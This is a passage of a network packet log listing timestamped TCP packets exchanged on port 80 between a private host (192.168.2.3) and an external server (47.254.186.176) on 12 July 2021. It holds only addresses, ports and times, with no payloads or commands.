Jul 12, 2021 10:29:48.946372986 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.946381092 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.946400881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.946419001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.946439981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.946449041 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.946508884 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.946521044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.946928978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.946949005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.946970940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.946996927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.947051048 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.947076082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947285891 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.947312117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947331905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947351933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947400093 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.947427034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947448015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947470903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947494984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947500944 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.947520018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947539091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947567940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947592020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947602987 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.947663069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.947779894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947845936 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.947926044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947983027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.947993994 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.948018074 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.948026896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948043108 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.948060036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948080063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948095083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.948107958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948127985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948147058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948156118 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.948178053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948199034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948218107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948236942 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.948244095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948261976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948280096 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948287964 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.948306084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948348045 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.948378086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948400021 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.948474884 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.948903084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948924065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948985100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.948998928 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.949022055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.949043036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.949064016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.949078083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.949094057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.949117899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.949126959 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.949146986 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.949166059 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.949187994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.949193001 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.949212074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.949230909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.949244976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.949296951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.949307919 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.949326038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.949346066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.949356079 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.949440002 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.950040102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950123072 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.950237036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950258970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950278044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950326920 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.950347900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950367928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950390100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950402975 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.950423002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950444937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950458050 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.950472116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950514078 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.950541973 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950562954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950571060 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.950649023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950674057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950685024 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.950735092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950756073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950774908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950793982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950803995 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.950825930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950850964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950860977 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.950881004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950898886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950911999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.950926065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950947046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950964928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950984955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.950998068 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.951018095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.951041937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.951061964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.951080084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.951097965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.951109886 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.951170921 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.951183081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.951236010 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.951714039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.951735973 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.951791048 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.951821089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.951853991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.951893091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.951905012 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.951916933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.951947927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.951975107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.951994896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952013016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952032089 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.952039957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952058077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952078104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952100039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952121019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952171087 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.952194929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952236891 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.952312946 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.952636957 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952657938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952676058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952696085 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952713966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952722073 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.952739954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952768087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952780962 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.952797890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952816963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952828884 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.952846050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952866077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952879906 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.952897072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952919006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952929974 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.952950001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952971935 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.952980042 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.953031063 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.953047991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953428030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953495979 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.953638077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953717947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953737020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953754902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953777075 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953783035 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.953803062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953820944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953838110 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.953847885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953867912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953887939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953892946 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.953911066 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953928947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953948975 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.953960896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.953983068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954001904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954010963 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.954066038 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.954595089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954621077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954638004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954658031 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954670906 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.954689026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954708099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954730034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954750061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954770088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.954778910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954801083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954819918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954838991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954860926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954885006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954890966 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.954910040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954926968 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.954941034 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.955046892 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.955404043 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955477953 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.955506086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955528975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955549955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955559969 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.955579042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955611944 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.955640078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955657959 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955682039 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.955697060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955718040 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955735922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955754995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955763102 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.955780983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955799103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955817938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955836058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955862999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.955888987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.955933094 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.955965042 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.956048012 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.956355095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956391096 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956410885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956429005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956446886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956481934 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.956511974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956531048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956577063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956588984 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.956604958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956623077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956641912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956656933 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.956671000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956688881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956702948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956715107 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.956733942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956743002 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.956764936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.956774950 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.956810951 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.957384109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.957406044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.957442999 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.957480907 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.957503080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.957520008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.957565069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.959150076 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.966967106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.966999054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.967045069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.967272997 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.970236063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970262051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970277071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970295906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970315933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970328093 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.970352888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970361948 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.970381975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970398903 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.970407963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970474958 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.970491886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970511913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970530987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970547915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970561981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970606089 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.970917940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970940113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970962048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.970976114 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.971012115 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.971025944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.971046925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.971069098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.971124887 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.971162081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.971184015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.971201897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.971220016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.971227884 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.971246958 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.971299887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.971338987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.971344948 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.971399069 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.971420050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.971442938 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.971991062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972012997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972058058 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.972098112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972132921 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.972162008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972227097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972248077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972265959 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972280025 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.972321033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972327948 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:48.972349882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972373009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972393036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972409964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:48.972419977 CEST	49755	80	192.168.2.3	47.254.186.176
